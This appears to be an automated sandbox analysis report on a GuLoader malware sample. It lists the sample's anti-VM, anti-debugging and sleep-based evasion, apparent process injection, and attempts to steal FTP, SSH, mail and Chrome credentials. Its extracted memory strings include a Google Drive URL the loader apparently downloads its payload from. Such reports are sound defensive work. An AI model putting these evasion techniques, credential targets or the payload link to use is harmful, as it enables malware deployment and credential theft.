Source: Yara match File source: 00000000.00000002.503499325.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_00404CE7 push ebp; iretd 0_2_00404CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_00403391 pushad ; retf 0_2_00403392
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16HJEQVA7VECQQXWXMEW5I0BX_HPCAORFWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe RDTSC instruction interceptor: First address: 000000000040BD3F second address: 000000000040BD3F instructions: 0x00000000 rdtsc 0x00000002 cmp bh, FFFFFFB8h 0x00000005 xor eax, edx 0x00000007 cmp al, F9h 0x00000009 dec edi 0x0000000a cmp esi, 000000C9h 0x00000010 fabs 0x00000012 jmp 00007F9C1C38B0F5h 0x00000014 cmp edi, 00000000h 0x00000017 jne 00007F9C1C38B016h 0x0000001d cmp cl, FFFFFFA5h 0x00000020 mov ebx, EA4B6B4Eh 0x00000025 cmp cx, 0065h 0x00000029 xor ebx, 08A587D2h 0x0000002f cmp ecx, 59h 0x00000032 xor ebx, 9719A8D1h 0x00000038 cmp bx, 005Ch 0x0000003c fldpi 0x0000003e jmp 00007F9C1C38B0F3h 0x00000040 xor ebx, 75B7444Dh 0x00000046 cmp ah, FFFFFFF0h 0x00000049 cmp ch, FFFFFFA0h 0x0000004c rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6908 Thread sleep count: 71 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe TID: 6912 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8186 rdtsc 0_2_02AD8186
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Window / User API: threadDelayed 1144
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Window / User API: threadDelayed 8856
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe System information queried: ModuleInformation
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732429567.00000000008D8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16hJeQVa7vECqqXwxmeW5i0BX_hPCAorFwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000000.00000002.503555930.0000000003370000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732625102.0000000002270000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.__vbaHresultCheckObj.22789.exe, 00000016.00000002.732485311.0000000000924000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0000

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD8186 rdtsc 0_2_02AD8186
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD2EAE mov eax, dword ptr fs:[00000030h] 0_2_02AD2EAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD39B1 mov eax, dword ptr fs:[00000030h] 0_2_02AD39B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD89F6 mov eax, dword ptr fs:[00000030h] 0_2_02AD89F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7D38 mov eax, dword ptr fs:[00000030h] 0_2_02AD7D38
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD7714 mov eax, dword ptr fs:[00000030h] 0_2_02AD7714
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD577E mov eax, dword ptr fs:[00000030h] 0_2_02AD577E
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Code function: 0_2_02AD6813 LdrInitializeThunk, 0_2_02AD6813

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.22789.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data